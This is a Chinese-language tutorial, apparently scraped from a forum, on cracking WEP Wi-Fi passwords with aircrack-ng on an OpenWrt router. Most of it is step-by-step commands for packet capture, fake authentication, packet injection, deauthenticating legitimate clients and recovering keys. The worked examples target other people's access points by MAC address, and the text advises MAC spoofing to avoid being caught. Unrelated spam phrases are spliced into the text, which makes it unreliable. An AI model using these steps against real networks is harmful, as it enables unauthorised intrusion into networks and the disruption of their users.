openwrt wifi密码(在无线路由器上破解无限密码)
openwrt wifi密码
openwrt aircrack-ng破解
wpawep包的命令
opkg update
opkg install aircrack-ng screen
airmon-ng start mon.wlan0
airmon-ng start wlan0
screen
cd /mnt/sda1  #这里是保存路径,我是挂U盘保存数据包
airodump-ng -w name mon0
___________________________________________________________________________________________
下面是实例破解AP:cisco
加密码方式:WEP 64
AP频道:11
APMAC地址:  00:0F:34:C1:29:CA
我自己的MAC地址:00:74:04:02:B5:EA
opkg update
opkg install aircrack-ng
opkg install screen
//screen支持后台运行 可以后台抓包同时后台注入然后后台破解密码      抓包或破解时可以不用开电脑
//连接路由器新建一个screen 后台运行抓包
screen
//扫描信号
iwlist wlan0 scanning

airmon-ng start mon.wlan0
//查看无线网信息


//精确 monitor 11频道。 也就是创建 mon0        可以用airmon-ng stop mon0 关闭
//airmon-ng start wlan0    全频道
airmon-ng start wlan0 11


//开始抓包 在这里会显示扫描到的AP  从这里选择要破解的AP SSIDMAC地址等信息
//airodump-ng -w name mon0        参数 --ivs 只抓WEP    -c 11 椒盐排骨11频道
airodump-ng --ivs -w name -c 11 mon0

//我要破解的cisco 没有客户端  所以下面用注入方式
_________________________________________________________
|//抓包方式2 只抓MAC00:0F:34:C1:29:CA的包                                  |
|//airodump-ng -c 11 --bssid 00:0F:34:C1:29:CA -w name-01.ivs mon0    |
|_________________________________________________________|
//新建一个ssh 会话
//AP建立虚拟连接
//aireplay-ng -1 0 -a AP'sMAC -h MyMAC mon0
//AP'sMAC是要破解APMAC地址 -h后面跟着的MyMAC是自己的无线网卡的MAC地址 )
// 自己的无线网卡的MAC地址用ifconfig iwconfig查看


aireplay-ng -1 0 -a 00:0F:34:C1:29:CA -h 00:74:04:02:B5:EA mon0
//进行注入
//aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP'sMAC -h MyMAC mon0
//成功建立虚拟连接后输入:
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:0F:34:C1:29:CA -h 00:74:04:02:B5:EA mon0


//现在回头看下步骤3的终端是不是DATA在开始飞涨!
//等抓到1万数据包就可以破解,我抓到了29052IVS
//新建一个ssh 会话
//进行WEP 64位破解
//aircrack-ng name-01.ivs
//aircrack-ng *.ivs
//aircrack-ng *.cap
aircrack-ng -n 64 name-01.ivs
选择要破解的SSID 序号  3


我运气好几秒钟就破出来了
aircrack-ng - *.cap
aireplay-ng的六种攻击模式详解
-0 deautenticate冲突模式
使已经连接的合法客户端端强制断开与路由器的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效的arp数据。
如果一个客户端连在路由器上,但是没有人上网来产生有效数据,此时即使用-3也无法产生有效的arp数据,所以就需要用-0攻击模式来配合-3攻击来会被激活
aireplay-ng-0 10 -a ap_mac -c 合法客户端mac wifi0
参数说明:10 表示发送次数(设置为0表示循环攻击,客户端无法正常上网)
-a设置apmac地址,-c设置已连接的合法客户端的mac地址(如果要-c则所有与ap连接的客户端全部断线)

-1 fakeauth count 伪装一个客户端和ap进行连接
这是没有客户端研究学习的第一步,因为是没有合法连接的客户端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注入命令
aireplay-ng-1 0 -e ap_essid -a ap_mac -h my_mac wifi0
参数说明:0表示岩石0秒后连接;-e设置ap_essid-a设置apmac地址 -h设置伪装客户端的网卡mac地址(就是自己网卡的mac地址)

-2 interactive 交互模式
这个模式集合了抓包和提取数据,发包注入三种功能
ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0
参数说明:-p设置控制帧中包含的信息(16进制),默认采用0841-c:设置目标mac地址;-b设置apmac地址;-h伪装的客户端网卡mac地址(就是自己的mac地址)
提取包,发送注入数据包
aireplay-ng-2 -r myarp -x 1024 wifi0
参数说明:myarp:自己设置的文件名;-x 1024:发包的速度(最大为1024

-3 arp-request注入攻击模式
这种模式是一种抓包后分析重发的过程
aireplay-ng-3 -b ap_mac -h 合法客户端mac -x 512 wifi0

-4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件
aireplay-ng-4 -b ap-mac -h my_mac wifi0

-5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀为xor的文件)
aireplay-ng-5 -b ap_mac -h my_mac wifi0
packetforge-ng 数据包制造程序
packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam_xor -w mrarp
参数说明:-0:伪装arp数据包;-k:设置目标文件ip和端口;-l:设置源文件IP和端口;-y:从xor文件中读取PRGAnamexor文件的名字;-w设置伪装的arp包的文件名
aircrack-ng -n 64 -b ap_mac name-01.ivs
参数说明:-n设置key长度(64/128/256/512
 
screen 使用
screen -ls  '显示screen列表
screen -r id '进入会话

Ctrl-aCtrl-c 切换到之前显示的窗口
Ctrl-d 暂时断开会话
C-a n 切换到下一个窗口
C-a p 切换到前一个窗口(C-a n相对)

C-a ? 显示所有键绑定信息
C-a w 显示所有窗口列表
C-a C-a 切换到之前显示的窗口
C-a c 创建一个新的运行shell的窗口并切换到该窗口
C-a n 切换到下一个窗口
C-a p 切换到前一个窗口(C-a n相对)
C-a 0..9 切换到窗口0..9
C-a a 发送 C-a到当前窗口
C-a d 暂时断开5月黄道吉日查询2023年screen会话
C-a k 杀掉当前窗口
张杰 我想C-a [ 进入拷贝/回滚模式
______________________________________________________________________
Openwrt 下支持 aircrack-ng WRT54G 能破解,那RG100A应该也能,来精神,心动不如行动吧。

首先opewnrt需安装两个Packager
SecureCRT 连接 RG100a
opkg update
opkg install aircrack-ng
opkg install screen    '后台操作

安装后 就可以进行分析抓包了。

建立无线 monitor
screen        (建立screen, 试便下次用screen 登陆回来)
建立monitor 用于数据采集
airmon-ng start mon.wlan0
查看无线网信息
airodump-ng mon0   
 
下载 (29.29 KB)
3 天前 17:23


分析: 查到三个无线AP均无客户端,  WEP无客户端破密有两种方法,1,守株待免,一直开着直到有客户端连接抓到一定数量的data为止, 2,采用aireplay-ng 方式注入产生大量数据包。当 data 数量但到1万左右就应该可以破WEP 密码啦。

==============================================
我使用了第二种方法。注入,破密对象是 HG520s

精确 monitor 11频道。
airmon-ng start mon.wlan0 11

airodump-ng --ivs -w name -c 11 mon0  11频道抓包存储在 name文件

攻击 ap之前建立一个虚拟连接 这步是关键
aireplay-ng -1 0 -e HG520s -a 00:16:E3:BB:FD:CF -h 00:1F:A3:B2:11:D0  mon0
注: HG520S 是对方AP 00:16:E3:BB:FD:CF 是对方MAC  00:1F:A3:B2:11:D0RA100A的无线MAC ifconfig 可以查到。


交互功击模式(即注入的其中一种方式)
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:16:E3:BB:FD:CF -h 00:1F:A3:B2:11:D0 mon0


出现 usr this packer ?  输入后, 你会看到


data数量在猛增, 当达到1万时就可以停止,进行解密啦。
aircrack-ng -a wep name-01.ivs -

显示的就是 wep 密码
 
 
 
 
 
____________________________________________________________________________
Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
airmon-ng 处理网卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 发包,干扰
另外还要用到以下 linux 命令:
ifconfig 查看修改网卡状态和参数
macchanger 伪造 MAC
iwconfig 主要针对无线网卡的工具 ( ifconfig)
iwlist 获取无线网络的更详细信息
另外还有其他的 linux 基本命令,我就不提示了。

具体破解步骤:
1. 修改无线网卡状态:先 down
2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4. 修改无线网卡状态: up
5. 查看网络状态,记录下 AP MAC 和本机的 MAC ,确定攻击目标
6. 监听抓包:生成 .cap .ivs
7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8. 破解 .cap .ivs ,获得 WEP 密码,完成破解
下面详细介绍一下各个命令的基本用法(参照命令的英文说明)
1. ifconfig
用来配置网卡,我们这里主要用来 禁用和启用 网卡:
ifconfig ath0 down
ifconfig ath0 up
禁用一下网卡的目的是为了下一步修改 MAC
2.macchanger
用来改变网卡的 MAC 地址,具体用法如下:
usage: macchanger [options] device
-h 显示帮助
-V 显示版本
-s 显示当前MAC
-e 不改变mac,使用硬件厂商写入的MAC
-a 自动生成一个同类型的MAC,同厂商的
-A 自动生成一个不同类型的MAC,不同厂商的
-r 生成任意MAC
-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
-m 设置一个自定义的MAC : macchanger --mac=00:34:00:00:00:00 ath0
3.airmon-ng
启动无线网卡进入 Monitor 模式,
useage: airmon-ng <start|stop|check> <interface> [channel]
<start|stop|check> 启动,停止,检测
<interface> 指定无线网卡
[channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了
4.iwconfig
专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。
useageiwconfig interface [options]
[essid{NN|ON|OFF}] 指定essid 开启关闭
[nwid{NN|on|off}] 指定网络id 开启关闭
[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型
[freq N.NNNN[K|M|G]] 指定工作频率
[channel N] 指定频道
[ap {N|off|auto}] 指定AP 关闭/自动
[sens N] sens
[nick N] nick
[rate {N|auto|fixed}] 速率控制
[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了
[frag {N|auto|fixed|off}] 碎片控制
[enc {NNNN-NNNN|off}] 范围
[power {period N|timeout N}] 电源 频率/超时
[retry {limit N|lifetime N}] 重试 限次/超时
[txpower N{mw|dBm}] 功率 毫瓦/分贝
[commit] 处理
5.iwlist
主要用来显示无线网卡的一些附加信息,同上
useage: iwlist [interface] options
scanning 扫描
frequency 频率
channel 频道
bitrate 速率
rate 速率
encryption 加密
key 密钥
power 电源
txpower 功率
ap ap
accespoints ap
peers 直连
event 事件

6.airodump-ng
抓包工具,我最喜欢用的,详细用法如下:
usage: airodump-ng <options> <interface>[,<interface>,...]
Options:
--ivs :仅将抓取信息保存为 .ivs
--gpsd :使用 GPSd
--write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分
-w : --write
--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的
--update <secs> :显示更新延迟,没有用过
--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了
-h :隐藏已知的,配合上面的选项使用
-f <msecs> :跳频时间
--berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120.建议学好英文去读原文, 译的都会有出入,这是我的理解.(mhy_mhy)
-r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵
Filter options:
--encrypt <suite> : 使用密码序列过滤 AP
--netmask <netmask> : 使用掩码过滤 AP
--bssid <bssid> : 使用 bssid 过滤 AP
-a : 过滤无关的客户端
默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:
--channel <channels>:指定频道
--band <abg> :制定带宽
-C <frequencies> :指定频率MHz
--cswitch <method> : 设置频道交换方式
0 : FIFO (default) 先进先出(默认)
1 : Round Robin 循环
2 : Hop on last 最后一跳
-s : 同上
--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文
7.aireplay-ng
搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : AP MAC
-d dmac : 目标的 MAC
-s smac : 来源的 MAC
-m len : 最小包长度
-n len : 最大包长度
-u type : 帧控制, type field
-v subt : 帧控制, subtype field
-t tods : 帧控制, To DS bit
-f fromds : 帧控制, From DS bit
-w iswep : 帧控制, WEP bit
-D : 禁用 AP 发现功能
Replay options:
-x nbpps : 每秒包数量
-p fctrl : 框架设定 (hex)
-a bssid : 设置AP mac
-c dmac : 设置目标的 MAC
-h smac : 设置来源的 mac
-g value : 改变环缓存大小 (默认8)
-F : 选择第一个匹配的包
Fakeauth attack options:
-e essid : 设置目标 AP SSID
-o npckts : 每秒爆破的包数量 (0 自动, 默认 1)
-q sec : 存活时间秒
-y prga : 共享可信的 key
Arp Replay attack options:
-j : 注入 fromDS 数据包,还没有用过这个选项
Fragmentation attack options:
-k IP : 设置目的IP 碎片
-l IP : 设置源IP碎片
Test attack options:
-B : 激活 bitrate 测试
source options:
-i iface : 设置抓包的接口设备
-r file : pcap文件析取数据包
attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方
--deauth count : 不信任一切 (-0)
--fakeauth delay : 欺骗AP的信任 (-1)
--interactive : 交互的选择 (-2)
--arpreplay : 标准的 ARP-request replay (-3)
--chopchop : 解密 WEP (-4)
--fragment : 生成有效的 key (-5)
--caffe-latte : 从客户端获取新的 IVs (-6)
--cfrag : 对客户端进行碎片攻击 (-7)
--test : 测试注射及效果 (-9)
雷峰夕照
--help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.

8.aircrack-ng
破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.
usage: aircrack-ng [options] <.cap / .ivs file(s)>
Common options:
-a <amode> : 暴破 (1/WEP, 2/WPA-PSK)
-e <essid> : 选择 essid 为目标
-b <bssid> : 选择 ap mac 为目标,就是破解识别的关键字
-q : 使用安静模式,无数出模式
-C <macs> : 将所有的 AP 合并为一个虚拟的
小姑娘打字Static WEP cracking options:
-c : 仅搜索字母数字
-t : 仅搜索二进制
-h : 搜索数字关键字 (用于坏掉的部分),翻译不出来了
-d <mask> : 指定掩码(A1:XX:CF:YY)
-m <maddr> : MAC 匹配可用的数据包
-n <nbits> : WEP 长度 64/128/152/256/512
-i <index> : WEP 索引(1 to 4), default: any
-f <fudge> : 暴破强度 默认2,韩国现代汽车原文字面意思是"禽兽强迫 捏造事实",呵呵
-k <korek> : 禁用一种破解方式 (1 to 17)
-x or -x0 : 禁用最新关键字暴破
-x1 : 使用最新关键字暴破 默认
-x2 : 用最新两个字节暴破
-y : 实验单线程模式
-K : KoreK 攻击 (pre-PTW)
-s : 显示为 ASCII
-M <num> : 最大数量 ivs 使用
-D : WEP 非隐蔽模式
-P <num> : PTW debug: 1 disable Klein, 2 PTW
-1 : 尝试一次 PTW
WEP and WPA-PSK cracking options:
-w <words> : 指定目录文件,可以多个
-r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用
--help : 显示这个帮助
说明:
好了,用法都解释完了,主要是后面这三个命令,这是我从英文译过来的,结合我的使用情况,以及我的理解.参数全,没有漏掉任何一项,可能我是第一个把这个完整翻译过来的,之前我没有到有翻译好的,有些地方并不是准确的遵循原文,希望感兴趣的朋友在转载的时候注上我:mhy_mhy.
下面以我的硬件实例来操作一下:
我的硬件是 atheros a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:
ifconfig ath0 down
macchanger -r ath0
macchanger -r wifi0
ifconfig ath1 up
airmon-ng start ath1 6
iwconfig ath1
iwlist ath1 scanning
airodump-ng -w *.cap -c 6 ath1
aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1
aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1
aircrack-ng -x -f 2 *.cap
aircrack-ng - *.cap
aircrack-ng -n 64 -b apmac *.ivs
aircrack-ng - -b 00:00:00:00:00:00 *.cap
 

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。